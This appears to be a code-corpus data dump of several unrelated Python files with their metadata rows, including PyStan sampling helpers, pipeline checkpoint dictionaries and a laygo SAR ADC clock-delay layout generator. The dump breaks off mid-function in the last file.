    """Return the raw 16-byte MD5 digest of *source_data* (a bytes-like object)."""
    hasher = hashlib.md5(source_data)
    return hasher.digest()
| 15.833333
| 44
| 0.778947
| 14
| 95
| 5
| 0.642857
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024096
| 0.126316
| 95
| 5
| 45
| 19
| 0.819277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
7978a4b4e371a0a844fe4b73bb2960927478d2f8
| 6,472
|
py
|
Python
|
fit_and_load_stan_model.py
|
JanMuench/Tutorial_Bayesian_Filter_cPCF_data
|
48a4b31eca62d0ab3a941bc34e431a2772f04dbf
|
[
"MIT"
] | null | null | null |
fit_and_load_stan_model.py
|
JanMuench/Tutorial_Bayesian_Filter_cPCF_data
|
48a4b31eca62d0ab3a941bc34e431a2772f04dbf
|
[
"MIT"
] | null | null | null |
fit_and_load_stan_model.py
|
JanMuench/Tutorial_Bayesian_Filter_cPCF_data
|
48a4b31eca62d0ab3a941bc34e431a2772f04dbf
|
[
"MIT"
] | null | null | null |
import os
import pickle
import numpy as np
def load(filename):
    """Reload a compiled (pickled) Stan model for reuse.

    Parameters
    ----------
    filename : str
        Path of the pickle file to load.

    Returns
    -------
    The unpickled object (a compiled Stan model in this project).

    Notes
    -----
    The original implementation did ``pickle.load(open(filename, 'rb'))`` and
    leaked the open file handle; a context manager closes it deterministically.
    """
    print("Trying to load pickle in:")
    print(os.getcwd())
    with open(filename, 'rb') as f:
        return pickle.load(f)
def create_model_and_fit(DATA, name, sampling_iter, warmingUp, chains):
    """Load a pickled Stan model and draw posterior samples from it.

    Parameters
    ----------
    DATA : dict
        Data dictionary passed to ``model.sampling``.
    name : str
        Pickle file of the compiled Stan model; falls back to
        "RE_approach.pic" when it cannot be loaded.
    sampling_iter : int
        Total number of iterations per chain (coerced with ``int``).
    warmingUp : int
        Number of warm-up iterations.
    chains : int
        Number of MCMC chains.

    Returns
    -------
    tuple
        ``(fit, model)`` — the fit object and the model it was drawn from.
    """
    print("get model and fit:"+os.getcwd())
    try:
        model = load(name)
    except Exception:  # narrowed from bare `except:`; fall back to the default model
        model = load("RE_approach.pic")
    print("sampling_iter", sampling_iter)
    print("sampling in: " + os.getcwd())
    print("warmup"+str(warmingUp))
    print("chains"+str(chains))
    # (A large block of commented-out alternative sampling code was removed.)
    fit = model.sampling(DATA,
                         n_jobs=-1,
                         chains=chains,
                         thin=2,
                         warmup=warmingUp,
                         iter=int(sampling_iter),
                         verbose=True,
                         refresh=100,
                         test_grad=None)
    print("finished sampling")
    try:
        fit.summary()
    except Exception:  # summary failure is non-fatal; report and continue
        print("could not create fit summary")
    return fit, model
def fit_patch_fluo(DATA, name, sampling_iter, chains, warmup, seed, invMetric, stepsize, trained):
    """Sample the fluorescence model, optionally reusing a tuned sampler state.

    When ``trained`` is truthy, the pre-adapted ``stepsize`` and ``invMetric``
    are handed to the sampler through the ``control`` argument; otherwise the
    sampler adapts from scratch.

    Parameters
    ----------
    DATA : dict
        Data dictionary passed to ``model.sampling``.
    name : str
        Pickle file of the compiled Stan model; falls back to "RE_fluores.pic".
    sampling_iter, chains, warmup, seed : sampler configuration.
    invMetric, stepsize : pre-adapted sampler state (used only if ``trained``).
    trained : bool
        Whether to reuse the pre-adapted sampler state.

    Returns
    -------
    tuple
        ``(fit, model)``.
    """
    print("sampling_iter", sampling_iter)
    print("sampling in: " + os.getcwd())
    print("warmup"+str(warmup))
    print("chains"+str(chains))
    print("get model and fit:"+os.getcwd())
    print(name)
    try:
        model = load(name)
    except Exception:  # narrowed from bare `except:`; fall back to the default model
        model = load("RE_fluores.pic")
        print("Hallooooo")
    # The two original branches differed only in whether `control` was passed;
    # build the argument set once and add `control` conditionally.
    sampling_kwargs = dict(n_jobs=-1,
                           chains=chains,
                           thin=2,
                           warmup=warmup,
                           iter=sampling_iter,
                           verbose=True,
                           refresh=8,
                           test_grad=None,
                           seed=seed)
    if trained:  # was `trained == True`
        sampling_kwargs["control"] = {"stepsize": stepsize,
                                      "inv_metric": invMetric,
                                      "adapt_engaged": True}
    fit = model.sampling(DATA, **sampling_kwargs)
    # (Commented-out init_list/optimizing experiments removed.)
    print(fit)
    print("finished sampling")
    try:
        fit.summary()
    except Exception:  # summary failure is non-fatal; report and continue
        print("could not create fit summary")
    return fit, model
def PredicPriorDistri(DATA, name, sampling_iter, chains, warmup, seed, invMetric, stepsize, trained, algo):
    """Sample the (prior-)predictive distribution with a chosen algorithm.

    Identical to :func:`fit_patch_fluo` except that ``thin=1`` and the Stan
    sampling ``algorithm`` is selectable via ``algo``.

    Parameters
    ----------
    DATA : dict
        Data dictionary passed to ``model.sampling``.
    name : str
        Pickle file of the compiled Stan model; falls back to "RE_fluores.pic".
    sampling_iter, chains, warmup, seed : sampler configuration.
    invMetric, stepsize : pre-adapted sampler state (used only if ``trained``).
    trained : bool
        Whether to reuse the pre-adapted sampler state via ``control``.
    algo : str
        Sampling algorithm name forwarded to ``model.sampling``.

    Returns
    -------
    tuple
        ``(fit, model)``.
    """
    print("sampling_iter", sampling_iter)
    print("sampling in: " + os.getcwd())
    print("warmup"+str(warmup))
    print("chains"+str(chains))
    print("get model and fit:"+os.getcwd())
    print(name)
    try:
        model = load(name)
    except Exception:  # narrowed from bare `except:`; fall back to the default model
        model = load("RE_fluores.pic")
        print("Hallooooo")
    # The two original branches differed only in whether `control` was passed;
    # build the argument set once and add `control` conditionally.
    sampling_kwargs = dict(n_jobs=-1,
                           chains=chains,
                           thin=1,
                           warmup=warmup,
                           iter=sampling_iter,
                           verbose=True,
                           refresh=8,
                           test_grad=None,
                           seed=seed,
                           algorithm=algo)
    if trained:  # was `trained == True`
        sampling_kwargs["control"] = {"stepsize": stepsize,
                                      "inv_metric": invMetric,
                                      "adapt_engaged": True}
    fit = model.sampling(DATA, **sampling_kwargs)
    # (Commented-out init_list/optimizing experiments removed.)
    print(fit)
    print("finished sampling")
    try:
        fit.summary()
    except Exception:  # summary failure is non-fatal; report and continue
        print("could not create fit summary")
    return fit, model
| 31.2657
| 107
| 0.410383
| 562
| 6,472
| 4.620996
| 0.177936
| 0.069311
| 0.009241
| 0.046207
| 0.849057
| 0.832114
| 0.832114
| 0.832114
| 0.8067
| 0.773585
| 0
| 0.04881
| 0.487176
| 6,472
| 207
| 108
| 31.2657
| 0.733655
| 0.213226
| 0
| 0.858209
| 0
| 0
| 0.098929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.022388
| 0
| 0.08209
| 0.231343
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79c6281b4be7663b29506ef9edf4dfc0c9058098
| 3,172
|
py
|
Python
|
bin/phylociraptor_modules/outfiles.py
|
reslp/smsi-phylogenomics
|
b488b18d695c3f61270e2b0c1dc5242893dbcc39
|
[
"MIT"
] | null | null | null |
bin/phylociraptor_modules/outfiles.py
|
reslp/smsi-phylogenomics
|
b488b18d695c3f61270e2b0c1dc5242893dbcc39
|
[
"MIT"
] | null | null | null |
bin/phylociraptor_modules/outfiles.py
|
reslp/smsi-phylogenomics
|
b488b18d695c3f61270e2b0c1dc5242893dbcc39
|
[
"MIT"
] | null | null | null |
# Checkpoint done-files in pipeline dependency order: each mode requires the
# done-files of every mode that precedes it in this chain.
_done_chain = ["results/checkpoints/modes/%s.done" % step for step in
               ("phylogenomics_setup", "orthology", "filter_orthology", "align", "filter_align")]

# Mode -> list of checkpoint files that must exist before the mode may run.
# (Values are identical to the original hand-written literals; they are now
# derived from the shared prefix chain to remove the heavy repetition.)
outfile_dict = {
    "setup": _done_chain[:1],
    "orthology": _done_chain[:1],
    "filter-orthology": _done_chain[:2],
    "align": _done_chain[:3],
    "filter-align": _done_chain[:4],
    "speciestree": _done_chain[:5],
    "njtree": _done_chain[:5],
    "mltree": _done_chain[:5],
    "modeltest": _done_chain[:5],
    "report": _done_chain[:1]
}
steps_to_check = ["setup", "orthology", "filter-orthology", "align", "filter-align", "njtree", "modeltest", "mltree", "speciestree"]
# Mode -> the checkpoint file the mode itself writes when it finishes.
checkpoint_file_dict = {
    "setup": "results/checkpoints/modes/phylogenomics_setup.done",
    "orthology": "results/checkpoints/modes/orthology.done",
    "filter-orthology": "results/checkpoints/modes/filter_orthology.done",
    "align": "results/checkpoints/modes/align.done",
    "filter-align": "results/checkpoints/modes/filter_align.done",
    "speciestree": "results/checkpoints/modes/speciestree.done",
    "njtree": "results/checkpoints/modes/njtree.done",
    # NOTE: mltree maps to trees.done (not mltree.done) in the original.
    "mltree": "results/checkpoints/modes/trees.done",
    "modeltest": "results/checkpoints/modes/modeltest.done"
}
# Mode -> output directories to check for results.
# The original dict listed the "align" key twice ("results/alignments" was
# silently overridden by "results"); the dead first entry has been removed,
# keeping the value Python actually used.
outdir_dict = {
    "setup": ["results/orthology/busco/busco_set", "results/assemblies", "results/downloaded_genomes"],
    "orthology": ["results/orthology/busco"],
    "filter-orthology": ["results"],
    "align": ["results"],
    "filter-align": ["results/alignments/trimmed", "results/alignments/filtered"],
    "speciestree": [""],  # donefile will have to do as check: several possible output folder combinations for this step
    "njtree": [""],  # donefile will have to do as check: several possible output folder combinations for this step
    "mltree": [""],  # donefile will have to do as check: several possible output folder combinations for this step
    "modeltest": ["results/modeltest"]
}
| 77.365854
| 253
| 0.776166
| 363
| 3,172
| 6.69697
| 0.129477
| 0.303579
| 0.387906
| 0.244344
| 0.823118
| 0.766763
| 0.666392
| 0.65364
| 0.65364
| 0.65364
| 0
| 0
| 0.061475
| 3,172
| 40
| 254
| 79.3
| 0.816594
| 0.104035
| 0
| 0
| 0
| 0
| 0.815363
| 0.676533
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
30ebfa19b9a014242bb664eaef7efbe49c42d1f0
| 141
|
py
|
Python
|
pymiele/__init__.py
|
astrandb/pymiele
|
61d4d52ac6f191b3b64c57600072bc8f8179cdad
|
[
"MIT"
] | null | null | null |
pymiele/__init__.py
|
astrandb/pymiele
|
61d4d52ac6f191b3b64c57600072bc8f8179cdad
|
[
"MIT"
] | null | null | null |
pymiele/__init__.py
|
astrandb/pymiele
|
61d4d52ac6f191b3b64c57600072bc8f8179cdad
|
[
"MIT"
] | null | null | null |
"""Library for Miele integration with Home Assistant."""
from .const import * # noqa: F401, F403
from .pymiele import * # noqa: F401, F403
| 35.25
| 56
| 0.702128
| 19
| 141
| 5.210526
| 0.736842
| 0.20202
| 0.282828
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.177305
| 141
| 3
| 57
| 47
| 0.75
| 0.602837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
eb5f8dae7c094d63207329ab632cb03ce521a83b
| 153
|
py
|
Python
|
src/amuse/support/data/console.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 131
|
2015-06-04T09:06:57.000Z
|
2022-02-01T12:11:29.000Z
|
src/amuse/support/data/console.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 690
|
2015-10-17T12:18:08.000Z
|
2022-03-31T16:15:58.000Z
|
src/amuse/support/data/console.py
|
rieder/amuse
|
3ac3b6b8f922643657279ddee5c8ab3fc0440d5e
|
[
"Apache-2.0"
] | 102
|
2015-01-22T10:00:29.000Z
|
2022-02-09T13:29:43.000Z
|
import warnings
from amuse.support.console import *
# Backward-compatibility shim: re-export the relocated module's names and warn
# importers that amuse.support.data.console has moved.
warnings.warn("amuse.support.data.console has moved to amuse.support.console", DeprecationWarning)
| 25.5
| 98
| 0.816993
| 20
| 153
| 6.25
| 0.6
| 0.288
| 0.304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091503
| 153
| 5
| 99
| 30.6
| 0.899281
| 0
| 0
| 0
| 0
| 0
| 0.398693
| 0.30719
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
eb6a2330566ec8c37a13e9ac2ed57f1d99ac9e0e
| 54,164
|
py
|
Python
|
generators/adc_sar_sarclkdelay_layout_generator.py
|
xyabc/laygo_obsolete
|
86d795fd8e9c95b54dc80309a31bb1ad89e5c261
|
[
"BSD-2-Clause"
] | null | null | null |
generators/adc_sar_sarclkdelay_layout_generator.py
|
xyabc/laygo_obsolete
|
86d795fd8e9c95b54dc80309a31bb1ad89e5c261
|
[
"BSD-2-Clause"
] | null | null | null |
generators/adc_sar_sarclkdelay_layout_generator.py
|
xyabc/laygo_obsolete
|
86d795fd8e9c95b54dc80309a31bb1ad89e5c261
|
[
"BSD-2-Clause"
] | 1
|
2019-06-27T12:53:34.000Z
|
2019-06-27T12:53:34.000Z
|
#!/usr/bin/python
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
"""ADC library
"""
import laygo
import numpy as np
#from logic_layout_generator import *
from math import log
import yaml
import os
#import logging;logging.basicConfig(level=logging.DEBUG)
def create_power_pin_from_inst(laygen, layer, gridname, inst_left, inst_right):
    """Draw VDD and VSS power pins spanning from inst_left's pins to inst_right's pins."""
    vdd_left = laygen.get_inst_pin_coord(inst_left.name, 'VDD', gridname, sort=True)
    vdd_right = laygen.get_inst_pin_coord(inst_right.name, 'VDD', gridname, sort=True)
    vss_left = laygen.get_inst_pin_coord(inst_left.name, 'VSS', gridname, sort=True)
    vss_right = laygen.get_inst_pin_coord(inst_right.name, 'VSS', gridname, sort=True)
    # Each pin rectangle stretches from the left instance's lower corner to the
    # right instance's upper corner.
    laygen.pin(name='VDD', layer=layer, xy=np.vstack((vdd_left[0], vdd_right[1])), gridname=gridname)
    laygen.pin(name='VSS', layer=layer, xy=np.vstack((vss_left[0], vss_right[1])), gridname=gridname)
def generate_sarclkdelayslice(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4,
                              m=2, origin=np.array([0, 0])):
    """Generate one SAR clock-delay slice: two nand-gated delay paths into a 2:1 mux.

    Parameters
    ----------
    laygen : layout generator used for placement, routing and pinning
    objectname_pfix : str prefix for generated instance names
    templib_logic : template library holding the logic gate cells
    placement_grid : placement grid name
    routing_grid_m3m4 : metal3/metal4 routing grid name
    m : drive-strength multiplier selecting gate templates (default 2)
    origin : placement origin in grid coordinates
    """
    pg = placement_grid
    rg_m3m4 = routing_grid_m3m4
    # Template cell names are parameterized by the drive strength m.
    inv_name = 'inv_' + str(m) + 'x'
    nand_name = 'nand_' + str(m) + 'x'
    mux_name = 'mux2to1_' + str(m) + 'x'
    # placement: cells are placed left-to-right in one row.
    isel0 = laygen.place(name="I" + objectname_pfix + 'INVSEL0', templatename=inv_name,
                         gridname=pg, xy=origin, template_libname=templib_logic)
    inand0 = laygen.relplace(name="I" + objectname_pfix + 'ND0', templatename=nand_name,
                             gridname=pg, refinstname=isel0.name, template_libname=templib_logic)
    iinv00 = laygen.relplace(name="I" + objectname_pfix + 'INV00', templatename=inv_name,
                             gridname=pg, refinstname=inand0.name, template_libname=templib_logic)
    inand1 = laygen.relplace(name="I" + objectname_pfix + 'ND1', templatename=nand_name,
                             gridname=pg, refinstname=iinv00.name, template_libname=templib_logic)
    iinv10 = laygen.relplace(name="I" + objectname_pfix + 'INV10', templatename=inv_name,
                             gridname=pg, refinstname=inand1.name, template_libname=templib_logic)
    iinv11 = laygen.relplace(name="I" + objectname_pfix + 'INV11', templatename=inv_name,
                             gridname=pg, refinstname=iinv10.name, template_libname=templib_logic)
    iinv12 = laygen.relplace(name="I" + objectname_pfix + 'INV12', templatename=inv_name,
                             gridname=pg, refinstname=iinv11.name, template_libname=templib_logic)
    imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
                            gridname=pg, refinstname=iinv12.name, template_libname=templib_logic)
    # internal pins: coordinates of every instance pin on the m3/m4 grid
    pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
    # internal routes: x0/x1 bracket the slice horizontally, y0 is the base track
    x0 = laygen.get_inst_xy(name=isel0.name, gridname=rg_m3m4)[0] + 1
    x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
         +laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1
    y0 = pdict[isel0.name]['I'][0][1] + 0
    #route-sel: SEL drives nand1.B / mux EN1 directly and nand0.B / mux EN0 inverted
    [rv0, rsel0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
                                         pdict[inand1.name]['B'][0], y0, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
                                       pdict[imux0.name]['EN1'][0], y0, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
                                       pdict[inand0.name]['B'][0], y0+1, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
                                       pdict[imux0.name]['EN0'][0], y0+1, rg_m3m4)
    #route-input: the input net fans out to both nand A inputs
    rv0, rin0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand0.name]['A'][0],
                                np.array([x0, y0+2]), rg_m3m4)
    rv0, rin1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand1.name]['A'][0],
                                np.array([x0, y0+2]), rg_m3m4)
    #route-path0: nand0 -> inv00 -> mux input I0 (short path)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand0.name]['O'][0],
                                       pdict[iinv00.name]['I'][0], y0+3, rg_m3m4, extendl=2, extendr=2)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv00.name]['O'][0],
                                       pdict[imux0.name]['I0'][0], y0+4, rg_m3m4)
    #route-path1: nand1 -> inv10 -> inv11 -> inv12 -> mux input I1 (delayed path)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand1.name]['O'][0],
                                       pdict[iinv10.name]['I'][0], y0+3, rg_m3m4, extendl=2, extendr=2)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv10.name]['O'][0],
                                       pdict[iinv11.name]['I'][0], y0+2, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['O'][0],
                                       pdict[iinv12.name]['I'][0], y0+3, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv12.name]['O'][0],
                                       pdict[imux0.name]['I1'][0], y0+5, rg_m3m4)
    #route-output
    rv0, rout0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
                                 np.array([x1, y0+2]), rg_m3m4)
    #pins: boundary pins for the slice's I / SEL / O nets
    laygen.create_boundary_pin_form_rect(rin0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(rout0, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='right')
    # power pin
    # NOTE(review): rg_m1m2 is not defined in this function; presumably a
    # module-level grid-name global defined elsewhere in this file — confirm.
    create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isel0, inst_right=imux0)
def generate_sarclkdelayslice_compact(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4,
                                      m=2, origin=np.array([0, 0])):
    """Generate a compact clock-delay slice: the mux selects between the
    undelayed input (I0) and a two-inverter delayed copy (I1).

    Same parameters as generate_sarclkdelayslice, but without the nand gating
    stages, so the slice is smaller.
    """
    pg = placement_grid
    rg_m3m4 = routing_grid_m3m4
    # Template cell names are parameterized by the drive strength m.
    inv_name = 'inv_' + str(m) + 'x'
    mux_name = 'mux2to1_' + str(m) + 'x'
    # placement: sel-inverter, two delay inverters, then the mux, left-to-right.
    isel0 = laygen.place(name="I" + objectname_pfix + 'INVSEL0', templatename=inv_name,
                         gridname=pg, xy=origin, template_libname=templib_logic)
    iinv11 = laygen.relplace(name="I" + objectname_pfix + 'INV11', templatename=inv_name,
                             gridname=pg, refinstname=isel0.name, template_libname=templib_logic)
    iinv12 = laygen.relplace(name="I" + objectname_pfix + 'INV12', templatename=inv_name,
                             gridname=pg, refinstname=iinv11.name, template_libname=templib_logic)
    imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
                            gridname=pg, refinstname=iinv12.name, template_libname=templib_logic)
    # internal pins: coordinates of every instance pin on the m3/m4 grid
    pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
    # internal routes: x0/x1 bracket the slice horizontally, y0 is the base track
    x0 = laygen.get_inst_xy(name=isel0.name, gridname=rg_m3m4)[0] + 1
    x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
         +laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1
    y0 = pdict[isel0.name]['I'][0][1] + 0
    #route-sel: SEL drives mux EN1 directly and EN0 through the inverter
    [rv0, rsel0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
                                         pdict[imux0.name]['EN1'][0], y0, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
                                       pdict[imux0.name]['EN0'][0], y0+1, rg_m3m4)
    #route-input
    #rv0, rin0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['I0'][0],
    #                            np.array([x0, y0+2]), rg_m3m4)
    #rv0, rin1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['I'][0],
    #                            np.array([x0, y0+2]), rg_m3m4)
    # Tie the undelayed input directly to mux input I0.
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['I'][0],
                                       pdict[imux0.name]['I0'][0], y0+2, rg_m3m4)
    #route-path1: inv11 -> inv12 -> mux input I1 (delayed branch)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['O'][0],
                                       pdict[iinv12.name]['I'][0], y0+3, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv12.name]['O'][0],
                                       pdict[imux0.name]['I1'][0], y0+5, rg_m3m4)
    #route-output
    rv0, rout0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
                                 np.array([x1, y0+2]), rg_m3m4)
    #pins: I is pinned directly on the inverter input here (not a boundary pin)
    laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=pdict[iinv11.name]['I'], gridname=rg_m3m4)
    #laygen.create_boundary_pin_form_rect(rin0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL", laygen.layers['pin'][4], size=6, direction='left')
    laygen.create_boundary_pin_form_rect(rout0, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='right')
    # power pin
    # NOTE(review): rg_m1m2 is not defined in this function; presumably a
    # module-level grid-name global defined elsewhere in this file — confirm.
    create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isel0, inst_right=imux0)
def generate_sarclkdelayslice_compact_2x(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4,
                                         m=2, origin=np.array([0, 0])):
    """Generate a compact clock-delay slice with a four-inverter delay path.

    Same parameters as generate_sarclkdelayslice_compact, but the delayed mux
    input (I1) goes through four inverters (INV11..INV14) for roughly twice
    the delay.
    """
    pg = placement_grid
    rg_m3m4 = routing_grid_m3m4
    # Template cell names are parameterized by the drive strength m.
    inv_name = 'inv_' + str(m) + 'x'
    mux_name = 'mux2to1_' + str(m) + 'x'
    # placement: sel-inverter, four delay inverters, then the mux, left-to-right.
    isel0 = laygen.place(name="I" + objectname_pfix + 'INVSEL0', templatename=inv_name,
                         gridname=pg, xy=origin, template_libname=templib_logic)
    iinv11 = laygen.relplace(name="I" + objectname_pfix + 'INV11', templatename=inv_name,
                             gridname=pg, refinstname=isel0.name, template_libname=templib_logic)
    iinv12 = laygen.relplace(name="I" + objectname_pfix + 'INV12', templatename=inv_name,
                             gridname=pg, refinstname=iinv11.name, template_libname=templib_logic)
    iinv13 = laygen.relplace(name="I" + objectname_pfix + 'INV13', templatename=inv_name,
                             gridname=pg, refinstname=iinv12.name, template_libname=templib_logic)
    iinv14 = laygen.relplace(name="I" + objectname_pfix + 'INV14', templatename=inv_name,
                             gridname=pg, refinstname=iinv13.name, template_libname=templib_logic)
    imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
                            gridname=pg, refinstname=iinv14.name, template_libname=templib_logic)
    # internal pins: coordinates of every instance pin on the m3/m4 grid
    pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
    # internal routes: x0/x1 bracket the slice horizontally, y0 is the base track
    x0 = laygen.get_inst_xy(name=isel0.name, gridname=rg_m3m4)[0] + 1
    x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
         +laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1
    y0 = pdict[isel0.name]['I'][0][1] + 0
    #route-sel: SEL drives mux EN1 directly and EN0 through the inverter
    [rv0, rsel0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
                                         pdict[imux0.name]['EN1'][0], y0, rg_m3m4)
    [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
